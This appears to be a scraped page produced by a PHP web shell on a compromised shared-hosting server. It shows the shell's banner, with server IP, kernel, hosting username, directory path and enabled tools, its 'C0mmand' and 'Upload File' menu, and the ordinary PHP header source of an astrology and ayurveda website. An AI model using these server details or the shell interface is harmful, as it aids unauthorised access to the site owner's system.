Server IP : 103.53.40.154 / Your IP : 18.226.226.151 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/jyotishandayurved.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php require_once("admin/config.php"); // seo $sqll = "SELECT * FROM `tbl_seo` WHERE se_id=1"; $runl = mysqli_query($db,$sqll) or die("Query Not run"); $datal = mysqli_fetch_assoc($runl); ?> <?php echo $datal["index_follow"];?> <meta name="google-site-verification" content="<?php echo $datal["site_verification"]; ?>" /> <?php echo $datal["google_analytic"]; ?> <!--srart theme style --> <link rel="stylesheet" type="text/css" href="css/animate.css" /> <link rel="stylesheet" type="text/css" href="css/bootstrap.css" /> <link rel="stylesheet" type="text/css" href="css/font-awesome.css" /> <link rel="stylesheet" type="text/css" href="css/fonts.css" /> <link rel="stylesheet" type="text/css" href="css/flaticon.css" /> <link rel="stylesheet" type="text/css" href="css/sign_flaticon.css" /> <link rel="stylesheet" type="text/css" href="css/owl.carousel.css" /> <link rel="stylesheet" type="text/css" href="css/owl.theme.default.css" /> <link rel="stylesheet" type="text/css" href="css/magnific-popup.css" /> <link rel="stylesheet" type="text/css" href="css/reset.css" /> <link rel="stylesheet" type="text/css" href="css/style2.css" /> <link rel="stylesheet" type="text/css" href="css/custom.css"/> <link rel="stylesheet" type="text/css" href="css/responsive2.css" /> <link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css" /> <!-- favicon links --> <link rel="shortcut icon" type="image/png" href="<?php echo $datal["favicon"] ?>" />